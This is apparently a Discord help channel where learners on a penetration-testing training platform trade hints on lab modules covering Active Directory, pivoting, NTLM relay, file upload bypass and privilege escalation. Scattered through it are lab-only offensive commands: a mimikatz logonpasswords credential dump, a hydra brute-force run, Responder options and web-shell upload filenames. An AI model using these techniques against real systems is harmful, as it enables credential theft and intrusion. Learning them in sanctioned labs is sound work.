#modules

1 messages · Page 333 of 1

safe star
#

Finally someone else questioned this😭

#

It literally makes no sense unless it has 2 network interfaces

#

Which it didn’t

sacred jacinth
#

ok my bad, that was the first question. Im guessing something went wrong with the target and hence you got the flag.

#

and ill be honest with you it's definitely not the hardest question it's very straight forward

reef pecan
limpid hemlock
#

??

sacred jacinth
reef pecan
sacred jacinth
tepid karma
#

Bro wtf

cloud dove
#

How can I contact someone in authority?

safe star
#

the module has a whole page for one btw

limpid hemlock
#

I see there is not targeti.p/cgi directory when we fuzz for it but when we fuzz for a bat file like targeti.p/cgi/*.bat i find one file i dont knw why that is like that since initialy simply targeti.p/cgi returns nothing like it doesnt exist

safe star
#

im pretty sure they can give a 404 on any page they like even if it exist

barren frigate
#

Can somebody Please help me regarding burpsuite I'm facing an issue

limpid hemlock
#

So we will think it doesnt exist right so then how will someone know to fuzz for a bat file like ffuf targeti.p/cgi/*.bat

barren frigate
#

While proxy is on in Burp Suite, when I request to the web, it doesn't give a response

#

When i disable foxyproxy extension everything works fine

safe star
#

theres nothing more to it tbh

barren frigate
#

Same issue on tryhackme Attackbox + VM

real delta
midnight galleon
safe star
#

isnt that the point?

midnight galleon
#

Or the website just lags?

barren frigate
#

I do but web just got stucked on browser

safe star
midnight galleon
#

Did you look at burpsuite when the website gets stuck?

#

So the idea behind burpsuite is that it captures the request to the website you enter in the url so that you can see/modify it before sending it, and when you are ready to send it, you press forward to let it go

barren frigate
#

Okayy now i got it thanks alot actually I'm beginner

midnight galleon
#

It's like you are a police officer in the street and you stop someone to inspect their car and then let them go when you are done coffee

barren frigate
#

Hahahaha this really help me alot to understand thank you so much

tender nimbus
#

Hey huys i neeed help, do i need to do that in burpsuit itself? or in my browser ?

#

im a little bit stuck ^^

safe star
#

it says in browser

#

what module is that?

#

thought they used foxy proxy for that

tender nimbus
#

payloads and shelss

#

im restarting my vm give me a sec

tender nimbus
#

is it not that in burp suite?

safe star
#

do you have foxyproxy?

#

its not in burp

tender nimbus
#

nope

safe star
#

its in firefox

#

go to firefox setting then search network

proper oar
#

in the SCCM module in the AD path, SCCMhunter is not printing all of the expected output. The pivot is functioning, the nmap scan displays services as expected in the internal network. Not sure if this is just me or not. It returns "connection failed" in the table for the SiteCodes.

midnight galleon
#

Or just use foxy proxy like everyone coffee

vivid sigil
midnight galleon
#

However if you want to copy the script from your attack box into the target box ( for example the target host doesn't have Internet interface)
Then in your attack box you spin a python server in the directory of the thing you want to transfer
And then go to the target and do
Curl -o /path/to/save/file.extension http://your_ip:python_server_port/path/to/file.extension

tender nimbus
vivid sigil
junior crater
#

Hey guys! I'm having some trouble with the nmap easy lab, even though I feel I have the answer. I did a -A -sV -T4 -Pn <IP> scan and I got the OS name. But for some reason it's still not taking it. Does anyone know if I'm missing anything?

golden scroll
#

Good day everyone. i noticed in the active directory module on the CPTS path i noticed that HTB consistently keeps calling inlanefreight.local(root-domain) and logisticsfreight.local (tree-root domain) as a cross forest trust in subsequent sections even though they are in the same forest which i think it is an intra forest. I think a cross forest trust deals with 2 root domains in different forest. Is there something I am missing

golden scroll
junior crater
#

I’ll try that, thank you!

limber river
junior crater
dapper moth
#

You can also get the whole trust relationship information with Get-DomainTrustMapping

golden scroll
#

thanks. I will add it to my notes. however this relation isnt a cross forest trust right but rather intra-forest

junior crater
cloud urchin
#

is that the first module you completed?

#

The quality of the modules is really unmatched. I'm sure you're in for a lot more you'll enjoy.

vale crow
#

hey guys i need some help, im currently attempting to do the skill assessmnet for stack-based buffer overflows on windows x86 and I am not 100% sure how to get the assessment.zip onto the rdp machine. I am using the pwnbox

vale crow
cloud urchin
vale crow
cloud urchin
#

HTB says 1 day = 8 hours. don't listen to those though, some of those that were longer took me way less time than it said, and vice versa. it really depends on the person and how well they grasp the subject. you can take a lot longer than what it says too if you get stuck which will probably happen. just go at your own pace.

vale crow
#

the box doesnt have internet, would it still be able to access the http server?

cloud urchin
vale crow
#

also after i RDP into the windows vm i cant see any part of my kali vm so idk how to move stuff from the kali vm to the windows i rdp into

vale crow
#

xfreerdp

cloud urchin
# vale crow xfreerdp

try adding /drive:/home/%user%/Desktop or whatever folder you want to the command, that will create a shared folder you can put files into

vale crow
#

so "xfreerdp /drive:/home/%user%/Desktop /u:htb-student /p:Academy_student! /v:x.x.x.x /f" ?

cloud urchin
#

yeah pretty much, it's just another xfreerdp parameter

vale crow
#

okay ill try that out thank you, and just so i dont goof this up, the %user% am i replacing that with my host username?

cloud urchin
#

yes, or replace the whole folder path with any other path you want to mount

#

that was just an example

vale crow
#

okay thanks again! ill try it out ad let you know if it worked for me

#

guys its not liking any of those commands

sick whale
#

What did you try Trippy?

vale crow
#

xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student,/D:\Downloads/dynamic-resolution/floatbar:sticky:on,default:visible,show:always

xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student\home\parrot\Downloads /dynamic-resolution/floatbar:sticky:on,default:visible,show:always

xfreerdp /drive:D:\Downloads /u:htb-student /p:Academy_student! /v:10.129.47.198

xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /drive:D:\Downloads /f

cloud urchin
#

you don't use the drive of the remote computer

#

you're sharing from the computer you're using the xfreerdp command

vale crow
#

in that case wouldnt this command work? "xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student\home\parrot\Downloads /dynamic-resolution/floatbar:sticky:on,default:visible,show:always"

cloud urchin
#

before typing xfreerdp type pwd, then use that path.

#

linux doesn't use c: or d:

vale crow
#

okay so i did that and now im RDP'd into the windows vm, how do i get that .zip file in there now?

cloud urchin
#

go to file explorer then my computer

vale crow
#

i dont have an option for my computer

#

okay so im assuming that drive at the bottom is for the instances parrot OS, i cant get the zip file in there either, even if i try to log into htb through the parrot vm it thinks im a bot so i cant log in

#

if i try to drag and drop the zip from host to parrot it gets blocked

cloud urchin
#

well yeah

#

using your own vm is a lot easier, you can transfer files from your host to your vm, and from the vm to the target

#

i didn't realize you were trying to transfer things to the pwnbox from your computer

vale crow
#

i would love to use my own vm, but it keeps dropping connection after 5 minutes

cloud urchin
#

you could not use the pwnbox and connect your windows machine to the vpn and rdp in that way probably

#

you didn't have the pwnbox active at the same time as your vm did you?

vale crow
#

mmmmmm i probably did tbh

#

lemme try with the instance off

cloud urchin
#

yeah that was probably the cause of your connectivity issues then, the pwnbox uses the same ip as your vpn would use

vale crow
#

ahh i got it moved over, im gonna try this! thanks so much man

river marsh
#

when sending a curl request is there a way to not get the body to print?

cloud urchin
#

you can output it to a file with -o

safe star
#

do you just want the headers?

river marsh
safe star
#

i dont think thats really possible unless you grep for certain things

#

do u just want it not on ur terminal or in a file like supernuts said

opaque stump
#

Hey guys i am new to this channel , i need a small hint on AD skill assessment part 2 , question i am stuck on locate a configuratiom file containing mssql connection string? I only need small nudge. Thanks

limber river
frosty ferry
#

Guys just a random question how long did it take you guys to complete cpts path (penetration tester path)

limber river
limber river
opaque stump
frosty ferry
limber river
sick whale
#

I am 3 months in, I alternate between doing modules and doing machines (easy ones to start with) and I'm about 40% in

#

A few hours a day

frosty ferry
limber river
#

sometimes 12+ , sometimes 4-5 depends on my mod

frosty ferry
#

Oh

#

And when did you start doing boxes?

safe star
frosty ferry
#

Like after the path or mid path

frosty ferry
limber river
# frosty ferry Oh

but sometimes I wasted times overthinking stuff or not understanding the sections

safe star
#

ejpt and pjpt but mostly pjpt helped

#

didnt learn much from ejpt

opaque stump
limber river
limber river
safe star
opaque stump
safe star
#

dont think so

limber river
frosty ferry
#

Oh

#

I am currently in infosec path and man it took me 3 weeks to complete the linux fundamentals

safe star
opaque stump
safe star
#

enumerate everything again once u gain access to another user

opaque stump
safe star
#

snaffler is also a useful tool

opaque stump
safe star
#

for both users?

opaque stump
#

so we have run for both users ?

#

yeah becuase they both have different rights

safe star
#

enumeration is an iterative process

limber river
opaque stump
#

got it

hard matrix
#

i just did this, so feel free to dm for some nudges

opaque stump
limber river
hard matrix
#

ah thought he was already logged in with the cred file

opaque stump
# limber river he was missing a step

I got it thank you , I thought snaffler works like responder I did not know it run with different user context it like how we enumerate smb shares

opaque stump
hard matrix
#

the hint for that step is useful :^)

opaque stump
reef pecan
proper oar
#

anyone else having the proxy time out on the SCCM module - SCCM Site Takeover 1 exercise? Can't get it to connect over mssql + proxychains despite having successful pivot tunnel still active, socks proxy session as SCCM01$ to the target mssql://172.50.0.30, I increased timeouts in proxychains4.conf, double checked the ports and IPs, PetitPotam is successful, the relay is successful - but the mssql session will not open. Used root / sudo shell as it mentioned, not sure what the issue is and I've now rebuilt the setup three times with the same result.

full wagon
#

No one experience this?? Everything just magically works for you? I really need to figure out why its so slow, and why it constantly just hangs, but not sure what is wrong. Would really appreciate some advice on best practices to make the setup with HTB work. I use my own Kali VM on virtualbox, and have resetted, swithced regions, re-downloaded vpn pack a number of times...

normal sand
safe star
#

couldnt find a version anywhere

hoary depot
#

Hey Seus Crissed! that's like forever in computeryears 👩‍🦽

fiery berry
lapis pulsar
#

im on the same, did you change RPORT to the one HTB gave you? and did you need to change the FILEPATH?

#

im only getting

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
safe star
lapis pulsar
#

i restarted the machine, Changed the rport and rhost to the one from htb. Tried diffrent filepath (both standard, to /flag.txt and /) but i still get same output

#
  Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     83.136.255.217   yes       The target host(s), see 
                                         /basics/using-metasploit.html
   RPORT      35722            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host
safe star
#

just tested it

lapis pulsar
#

yeah

safe star
#

try restarting one more time 😭

#

if that doesnt work you might have to change vpns

lapis pulsar
#

tried again didnt work... lets try that too

#

i now tried to do it in the pawnbox and it worked somehow...

lunar lily
lapis pulsar
#

Thanks for the help, yes its very likely the vpn thats causing the error or my kali vm. Everything worked as expected except the exploit so i thought i was the wrong one all along 😭 😂

lunar lily
#

Yes when starting to learn it's kinda hard to figure out whether exploits don't work or we don't use it correctly

#

So on the Pawnboxn does it also save the flag.txt on a hidden folder of your attacking machine?

indigo merlin
#

Not sure if this is where I post this question if not I'm sorry, but can anyone help me with this and care to explain it? I'm on module 19 section 102. The question I'm stuck on is "Enumerate the hostname of your target and submit it as the answer. (case-sensitive)"

dim wolf
#

include module name, section name, any solutions you've attempted, etc.

#

so that others can help you easier

indigo merlin
#

Oh I'm sorry its "Network Enumeration With Nma" "Host and Port Scanning"

#

with Nmap*

#

I would run sudo nmap the IP -sS -p-

jolly yacht
#

Hey, is it recommended to do the Documenting and Reporting Module after the Penetration Testing Process Module in the Penetration Testing job role path? because in the "Penetration Testing Process Module/Practice Section" the author mentioned to take minor technical and non technical documentation of each module to learn efficiently but to know how to take those documentation we should complete the Documentation and reporting module right?

dim wolf
#

the skills assessment for that module requires knowledge acquired from previous modules

#

it's also focused on documenting during a penetration test rather than general documentation

uncut linden
#

Hi I am going though Active Directory MOdule and I am a bit lost on why do we need autnentication via LDAP when we already have Kerberos ? can someone please guide

jolly yacht
next bronze
jolly yacht
uncut linden
#

Ok..so in SASL..user gets authenticated using Kerberos…and then requests via TGS to access LDAP server…LDAP server then uses challenge/response with the user to authorize it and once authorized the user can access the information in AD like users/groups/printers etc via LDAP…

#

Is this correct process…if not can you share what’s the correct flow

iron lintel
#

@rustic sage selem me3lekoem bro

#

Add me got some questions for you

next bronze
#

technically sasl supports gssapi which is used to interface with kerberos

jolly yacht
uncut linden
next bronze
jolly yacht
next bronze
jolly yacht
next bronze
jolly yacht
rich light
#

Hey, I am doing the NTLM Cross-protocol Relay Attacks part of the NTLM relay attacks module. In the fourth exercise we are supposed to see NTLM authentication attempts from NPORTS over HTTP to relay to LDAP(S), but when I run Responder with all options set to ON I only see SMB authentication coming in.

#

Running python3 Responder/Responder.py -I ens192 -wPdv with everything in Responder.conf set to ON just to see the authentication attempt coming in

#

As root of course 🙂

next bronze
next bronze
#

tested on EU3

rich light
#

Thanks. I'll pivot 😆

rich light
next bronze
safe robin
#

someone help i got tired of this even the easy lab

storm elk
#

thats not how it works @safe robin

#

You'll have to get to the answer yourself

#

Also - when asking for help - add which module/section you are working on

shell ore
storm elk
#

With a screenshot, we don't know anything

safe robin
#

its nmap Firewall and IDS/IPS Evasion - Easy Lab

#

look 2h of machine lifetime and i'm struggling with one question of easy lab

storm elk
#

Are you working with pwnbox or via your vm?

shell ore
safe robin
shell ore
#

lemme try rq since u mentioned the module

safe robin
storm elk
#

thanks @shell ore

shell ore
#

@safe robin mate tell me what ur trying to do

shell ore
safe robin
storm elk
strange forge
#

in the port forwarding with netsh. i got the file and 3 names in it. unable to understand the format of the answer

sick whale
#

First name last name with a space

#

Like "john doe"

#

not case sensitive, so could write JoHn DOe (but why would you)

#

(PS: john doe is obviously not the answer, take the name you found in the file 🙂 )

strange forge
sick whale
#

From my memories, only one is a person's name

#

Ok, given his last name is funny. But the answer is there.
Worse case try all three. Make sure if you copy paste that there are no space AFTER (trailing spaces)

tender nimbus
#

Hey guys im doing the skills engagement of the shell and apyload module, do you know how what i need to use here to go on the internet?

earnest pasture
somber fiber
#

flexing in there own environment lol

silent sleet
#

Anyone else notice the MSSQL, Exchange, and SCCM Attacks Skill Assessment box is very slow?

proper oar
#

forgot to add this in as well, sorry

slate halo
#

Hello, I need a nudge about Linux Privilege Escalation Sudo. Im in the root directory and see the flag.txt but when I cat it shows information about directories and not the actual flag.

proven raft
#

hey guys, I've been researching a way to escape restricted shells, but couldn't find a useful resource until now.

#

here is the output i get: ~$ ls
*** forbidden command: ls

silent sleet
silent sleet
#

yeah I think thats your problem, you need to be using the DEV release to make mssqlclient.py work

proper oar
#

I tried with the pre-installed one on the pwnbox, as well as cloning the repo they have in the guide

next bronze
#

that's just straight up connection refused though

#

try with -debug

silent sleet
next bronze
slate halo
#

Hello, I need a nudge about Linux Privilege Escalation Sudo. Im in the root directory and see the flag.txt but when I cat it shows information about directories and not the actual flag.

next bronze
#

providing the error would be helpful

slate halo
# next bronze providing the error would be helpful

[1,1,{"progname":"ncdu","progver":"1.14.1","timestamp":1727277461},
[{"name":"/root","asize":4096,"dsize":4096,"dev":64768,"ino":8194},
{"name":".viminfo","asize":8295,"dsize":12288,"ino":431},
{"name":".bashrc","asize":3106,"dsize":4096,"ino":276},
{"name":"flag.txt","ino":1789},

next bronze
#

doesn't seem like you're in a real shell

#

what's the command and what steps did you do

slate halo
#

im did the Sudo Policy Bypass

#

sudo -u#-1 /bin/ncdu

#

found the flag and then cat

kind jackal
#

hello all, i am trying to understand how to put the command in for HTB vpn i have read this but dont understand how to type it in the VM for it to generate a web broswer Connecting Using VPN
KingKevin@htb[/htb]$ sudo openvpn user.ovpn

next bronze
slate halo
next bronze
#

yes but did you check gtfobins

proper oar
next bronze
#

following the steps there worked for me

next bronze
proper oar
#

-debug gives basically the same output 😦

next bronze
#

your proxychains is timing out

proper oar
#

I tried increasing the timeout on the proxychains conf but no luck

next bronze
#

is 9050 the correct port

slate halo
proper oar
#

they match

next bronze
#

does ntlmrelay use socks4 or 5

proper oar
#

wait maybe I need to open a new shell 😮

proper oar
# next bronze are you sure

so proxychains.conf has 1080 set for 127.0.0.1 socks4 and socks5, tried with each individually first. ntlmrelayx socks proxy is listening on 127.0.0.1 1080. but for some reason proxychains is still calling 9050 ? Not sure how to adjust this if the conf is updated; I tried in a new shell and same result - the relay is still active

next bronze
#

send a screenshot of the config file

proper oar
#

okay so first mistake was it was calling proxychains.conf and not proxychains4.conf - adjusted that now.

Resolved: it worked with socks5 and editing proxychains.conf, not proxychains4.conf

full stratus
#

I have installed VMware and parrot. When i try to boot grub with my passphrase. I can only press enter which naturally gives me the wrong password, i can not write a single letter. If i press enter, then all of a sudden i can write but then it's just prompts. What to do?

soft reef
#

Is it possible I need an older sharphound version because bloodhound is not unzipping or processing the uploaded .zip file?

next bronze
next bronze
#

yep

#

sharphound will show the minimum version needed when you run it

soft reef
#

Ok thanks

grand jetty
#

hello everyone, i am pretty much stuck at finding a flag under public exploit (Pentesting Basics under Getting Started section), tried running all the exploits found on metasploit but no session is getting created, please advice

forest gust
next bronze
next bronze
rustic sage
#

Hey, kind of a stupid question a lil' bit but are these certifications good to put on a resume?

limpid hemlock
#

Hey im doing skill assesment 2 of attacking common applications anyone know how to find th fdqn of a vhost ??

tender nimbus
#

Hey guys i need help on the shell an payload module,

#

i uploaded a webshell but i dont know where i can find it

safe star
tender nimbus
safe star
#

thats the only way to get the login

#

sometimes you just have to guess what might be the login using context

safe star
tender nimbus
limpid hemlock
#

Hey im doing skill assesment 2 of attacking common applications anyone know how to find th fdqn of a vhost ??

safe star
limpid hemlock
#

Any help?

surreal orchid
#

Hello, sorry to interrupt but Active Directory Enumeration & Attacks >>> Attacking Domain Trusts - Child -> Parent Trusts - from Linux
looks like not working..
Starting the host and trying to connect with ssh return "Connection refused" and nmap doesn't reveal any 22/tcp open 😦

hexed lintel
#

check you vpn connection

safe star
hard matrix
surreal orchid
#

Waited like 10min, didn't work, restarted the VM and waited 10 min again 😦 still doesn't work

hexed lintel
#

try changing the vpn server and re download the vpn file

hard matrix
#

would also recommend double checking you're using the right creds for ssh

#

across a few of the ad modules the password you expect to use to login changes

#

ran into that myself

safe robin
#

stuck with this in Firewall and IDS/IPS Evasion - Medium Lab module

sacred jacinth
safe robin
#

Yes, I have

#

and tried searching this but cant

#

maybe i need yo retake this module😭😭

sacred jacinth
safe robin
#

are u sure cause even the easy one was difficult for me and i took help from acaard

sacred jacinth
safe robin
#

maybe I'm tired a little

#

I'll try again I'm not giving up easily i need to go through scan types and more specificly learn about packets

#

these ids/ips bypass is kweel stuff but its hard too😂🤌🤌

safe star
#

Maybe it’s for another user🥸

sacred jacinth
sacred jacinth
safe robin
old dome
#

hello just joined

safe robin
sacred jacinth
#

well its solution was also confusing for me, but it worked

old dome
#

why can i not talk in the general section??

limpid hemlock
sacred jacinth
#

dm me

safe star
#

Every windows machine has a certain built-in user

sacred jacinth
full wagon
#

Not sure what I'm missing here. Should be basic, but get stuck. Metasploit module 39, section 415 (it's he third question where an old sudo version should be abused - the module that is named Sessions). I have || tried several exploits for the vulnerable sudo version, including a bash one (that requires password for current user which I don't have), a python exploit that failed, and a c exploit that I could not compile on the target, and that failed when compiling on attack machine ||. What am I missing?

safe star
hexed lintel
#

no spoilers please.

quick laurel
hexed lintel
safe star
#

Have you tried other file formats?

sacred jacinth
limpid hemlock
full wagon
limpid hemlock
#

It just hangs i enterd smthg wrong propably dnt knw what

safe star
#

@quick laurel try looking at limited file uploads section

sacred jacinth
safe star
#

Did you find the first question?

limpid hemlock
#

Yes

quick laurel
quick laurel
safe star
#

Did u add the vhost correctly?

full wagon
# sacred jacinth no worries!

Thanks a lot, suspected that I totally missed something obvious. Shouldn't try to cross the bridge for water... 😅

sacred jacinth
limpid hemlock
safe star
#

Just add it to your /etc/hosts with the ip

#

Just like in the previous sections

limpid hemlock
#

It should be ip inlanefreight.local

#

Right

safe star
#

Yes

limpid hemlock
#

I put a .inlanefreight.local

#

Maybe that might have errored dont knw

safe star
#

U got it?

#

U also should’ve been able to find the vhost without ffuf

river marsh
#

if im using curl and it doesnt work if the url doesnt include the www. does that just mean the name server doesnt contain the url without the www. or is something else going on?

rugged turtle
#

Hi guys, I'm trying to perform a port forwarding within meterpreter in the module: Meterpreter Tunneling & Port Forwarding

However, anytime I try to execute the payload built with msfvenom I get a Segmentation Fault error.
I've done chmod +x on the file, i've started the handler and it simply gets closed due to this failure. Has anybody experience that ?

sick whale
#

You created the payload for the right arch ?

#

That could explain a segfault

limpid hemlock
rugged turtle
shut vapor
sick whale
rugged turtle
sick whale
#

Ok so depending on Pivot arch (windows or unix) you might have created the payload with the wrong option.
If address was wrong, you'd just get a connection timed out or just nothing. Not a segfault.

#

If that's not the issue, check that your metasploit is up to date I guess...
But then maybe people more qualified than me can help

shut vapor
rugged turtle
#

but at the same time, I'm not properly grasping why msfvenom is saying that

safe star
#

Is that the internal ip of the pivot host?

rugged turtle
#

hmmm, shouldn't it be my own machine?

safe star
#

It goes to the internal Target-> internal pivot-host ip -> our machine

#

Shouldn’t you be executing that on the target?

sick whale
#

What @safe star said ☝️

rugged turtle
#

Trying to figure it out, because actually I needed to ping sweep from the pivot to the internal target.
Thus, I thought about (not sure whether it's strictly required or not because I suppose you can already ping sweep it freely from the pivot) having a reverse shell from the pivot to my machine and perform a ping / nmap scan from my attack host to the internal target

safe star
rugged turtle
#

might be easier

safe star
rugged turtle
sick whale
#

Yup, much easier.
Or maybe just ssh -D for dynamic port forward and then ping sweep from your machine... That should work too @safe star right? (confirming since I remember being kinda confused too when I did this haha)

safe star
sick whale
#

Yeah of course 🙂 Just wanted to make sure I wasn't spewing an incorrect solution :p Thanks!

rugged turtle
#

Thank you guys 🙂 appreciate the tips!

#

damn, I think I got what I've forgot

#

I'm gonna try one last thing and let you know, just FYI 😄

safe star
#

so you would need to do a sweep from the pivot host first

rugged turtle
#

aight, I completely forgot to change my msfconsole payload 🥲

#

that was the reason why it wasn't working

forest gust
viral snow
#

can i possibly get some help on AD enumeration & attacks skills assessment part 2? i cannot for the life of me transfer kebrute and powerview onto the windows machine. i've scp'd from the ssh jump box, i scp'd from my linux machine, i scp'd from the windows machine. nothing i'm doing is working. any hints, please?

hexed lintel
#

if you are using xfreerdp then use /drive:share,.

safe star
uneven cairn
#

Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"

#

File Upload Attack
Blacklist Filters

#

im trying all extensinos and no one is working

safe star
uneven cairn
safe star
uneven cairn
#

YES

hexed lintel
uneven cairn
#

THE SECLIST ONE

viral snow
safe star
viral snow
uneven cairn
hexed lintel
uneven cairn
uneven cairn
#

but that is for windows servers

gray yacht
uneven cairn
#

im dealing with linux server

safe star
#

the extension isnt any of the ones u just listed

safe star
hexed lintel
# viral snow ligolo-ng?

https://jh.live/vanta || Prove your security compliance with Vanta! Get $1,000 off with my link: https://jh.live/vanta
The Pivoting Lab SnapLabs template: https://jh.live/pivoting

Free Cybersecurity Education and Ethical Hacking with John Hammond
📧 JOIN MY NEWSLETTER ➡ https://jh.live/email
🙏 SUPPORT THE CHANNEL ➡ https://jh.live/patreon
🤝 SPON...

▶ Play video
#

you will thank me

viral snow
hexed lintel
#

plus this resource

uneven cairn
viral snow
finite abyss
#

Abusing HTTP misconfig - Hard assessment
I poisoned the cache with a RXSS payload that send the cookie to interactsh
Still I am not getting any response from Admin in logs

safe star
finite abyss
safe star
#

you might get a better view in burp intruder

uneven cairn
safe star
#

ik but its full of unneeded extensions

foggy monolith
#

Re: AD Enum > ACL Abuse Tactics — if adunn's password isn't in rockyou.txt (which it isn't, as I already tried it with Hashcat to no avail), then what wordlist is it in?

#

Never mind, John the Ripper found it. Seems to be my new favorite cracking tool given that it's much more accurate at finding things.

safe star
#

did you put the right format?

limpid hemlock
#

Hey anyone knws what payload to use to get a revershe shell in the end of skill assesment 2 in attacking common applications

limpid hemlock
#

It is a nagios x1 application

#

I tried to ececute a bash shell but didnt wrk

hexed lintel
foggy monolith
#

Moving on: why is this happening in the DCSync lab? Any ideas? @cloud urchin?

safe star
#

already in bash

limpid hemlock
#

Mm dnt knw why i used rev shells created one

#

Started a netcat listner and al but no revshell got

safe star
#

why do u need revshells?

#

did u look up the version number?

limpid hemlock
#

Cause it asked to get a rev shell and get flG in the last question

safe star
#

you're talking about the revshells site right?

limpid hemlock
#

Yes

safe star
limpid hemlock
#

Ok

foggy monolith
safe star
foggy monolith
limber river
#

tbh rdp are kinda buggy in academy

safe star
foggy monolith
# limber river I used xfreerdp it works just fine

Wonder if Wayland is the problem then. In my case:

wlfreerdp /u:htb-student /p:'Academy_student_AD!' /w:$(math "3840*0.75") /h:$(math "2160*0.75") /v:$ip

Running Garuda Dr460nized + Plasma 6 + BlackArch tooling on my personal attack machine, for context.

rocky estuary
#

i'm doing the active directory module and i'm trying to use kerbrute with options -o to save the output to a file but its not working its creating an empty file

limber river
safe star
#

might grab the ascii art and extra stuff tho

rocky estuary
rocky estuary
safe star
limber river
safe star
#

so u will have to filter

rocky estuary
#

oh i see okay i will try grep then

novel lynx
#

HELP! Attacking Domain Trusts - Child -> Parent Trusts - from Linux. I desperately need a hint on how I can obtain the NTLM hash for the Domain Admin user bross. I got the shell running, but I am lost from here.

novel lynx
limber river
#

then you can use one of the attack to get the hash of any user you want

#

use mimikatz

safe star
novel lynx
#

I think this is where I am getting stuck, am i supposed to be using mimikatz in the shell? and if so, I have the hardest time transferring the tool to the shell

limber river
novel lynx
novel lynx
uneven sleet
#

Hey there is there anyone into CTF I have something to discuss

limber river
uneven sleet
#

Sorry if I am middle of some discussion

novel lynx
#

running this on my attack box:

safe star
#

u will need to do a double transfer

wild sage
#

Need some help with the Command Injection skill assessment, just need a point in the right direction

novel lynx
novel lynx
rocky estuary
limber river
safe star
cedar remnant
#

hello guys is there anyone can give me hint about foothold in zephyer Pro lab i have tried alot of things but i couldnt make it

wild sage
safe star
#

in the url

shrewd tendon
#

hello on the password attacks module in the network services i have found the credentials but i cannot connect to the RDP service

#

i get 'Connection reset by peer' error

#

any help

novel lynx
#

both these commands aren't working:

safe star
viral lotus
#

Hi I am on the information Gathering - Web Edition - Skills assessment. I have the answers to all but: What is the API key in the hidden admin directory that you have discovered on the target system? I know where the hidden directory is but I have tried gobuster but I am at a bit of a dead end what to do

novel lynx
rocky estuary
#

i tried to use kerbrute with password spray but i get this error ERR_ETYPE_NOSUPP KDC has no support for encryption type

novel lynx
limber river
#

or just read the ouput

safe star
novel lynx
#

i keep getting this error: mimikatz # sekurlsa::process lsass.exe
Switch to PROCESS

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

safe star
#

did you privilege::debug first

limber river
#

and he need NTLM of administrator ?

#

so ....

novel lynx
#

i need NTLM of bross, unless I need to crack the hash of the administrator and then use those creds to enumerate bross?

limber river
#

you just need the right technique , check the ACLs part in the course

safe star
foggy monolith
novel lynx
limber river
novel lynx
limber river
#

yeah

toxic bronze
#

How hackers access devices through a wifi?

viral lotus
novel lynx
# limber river yeah

ya gpt isn't being helpful, and I'm not sure how to progress with your hints, been at this for close to 3 hours now sadly

safe star
foggy monolith
toxic bronze
#

Linux is the best way for hackers?

limber river
safe star
fierce veldt
#

Is there any way to check when I completed a module in Academy?

limber river
foggy monolith
#

Everything returns "login failed for display 0." Is there another user and password I need to enumerate first?

limber river
fierce veldt
foggy monolith
strong skiff
#

Are we supposed to understand the results in the Service Scanning boxes initially? I just started the pentesting path. I'm reading through it all but I don't understand all of it to be honest.

novel lynx
safe star
#

The section breaks it down for you

novel lynx
#

@safe star

#

am I supposed to be doing a dcsync attack with mimi?

safe star
#

Dcsync and golden are the only mimikatz commands shown

novel lynx
#

ya

#

gpt is saying that the error is a permission issue, but i have the golden ticket

safe star
#

Don’t use gpt for that when you have the section in front of you

novel lynx
#

i'm only using gpt because I am big stuck

safe star
#

Gpt should help with explaining some commands and topics but it doesn’t really help in situations like this

safe star
novel lynx
#

the linux section has all I need, or the linux section plus the windows sections has all I need?

safe star
#

What part are u on?

novel lynx
#

After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross.

#

i have the shell with mimi installed is where I am at currently

safe star
#

You should be using Linux methods on the Linux portion

safe star
#

I thought u were on the previous section

novel lynx
#

i did this part:

#

there isn't anything in the section after this

safe star
#

Why not secrets dump using the user you made

#

The user should be an enterprise admin

#

@novel lynx u get it yet?

novel lynx
#

i'm retryng now

toxic bronze
#

In my office i suspected someone having access to my laptop.

#

And my phone too

topaz cliff
#

In XSS phishing assessment, when I want to send the link, I encounter this error: "Issue in sending URL!" I have tried multiple times and reconnected to the VPN connection several times.

topaz cliff
topaz cliff
safe star
topaz cliff
safe star
#

Did you restart?

topaz cliff
novel lynx
safe star
#

are those the correct credentials?

safe star
safe star
#

Send me the the url

safe star
safe star
# topaz cliff Yes

I only get that error when I send its own url, so it might be your payload

topaz cliff
cunning frigate
#

hey can i dm

quick laurel
loud dagger
#

to the people who have completed it, how long did the AD enum and attacks module take you?

hard matrix
#

About bruteforcing - Username Bruteforce section.

+ 0  Try running the same exercise on the question from the previous section, to learn how to brute force for users.

The command I am running is:

hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p amormio -u -f 94.237.53.113 -s 30445 http-get /

This is identical to what seems to be expected from the module. I'm actually going a little nuts here because this seems like such a stupid thing to be stuck on.

limber river
safe star
#

It’s really long

loud dagger
limber river
loud dagger
#

oh yeah that's true

safe star
#

Nah but I was familiar with most of it until the ACL and cross forest stuff

#

Just stuff from tcm

hard matrix
#

did the pnpt?

safe star
#

Pjpt

hard matrix
#

still have a second retake of the pnpt, was mega unprepared and tried doing the full asessment during a workweek lol

safe star
#

They upped the price by 200 😭

cloud urchin
limber river
#

pjpt+ soon

elfin dust
#

hi, im starting at lineux privilege escalation module, but im stuck in the firts lab environment enumeration, the question is Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer? but i search all the files and i cant find the flag, can anyone help me pls?

uneven cairn
#

hi

#

how i access to shell.php.\\.jpg

cloud urchin
#

what do you mean

uneven cairn
#

i already upload a web shell in that path, but i dont get in when i try to navegate there in url

safe star
uneven cairn
#

neither shell.php/.jpg

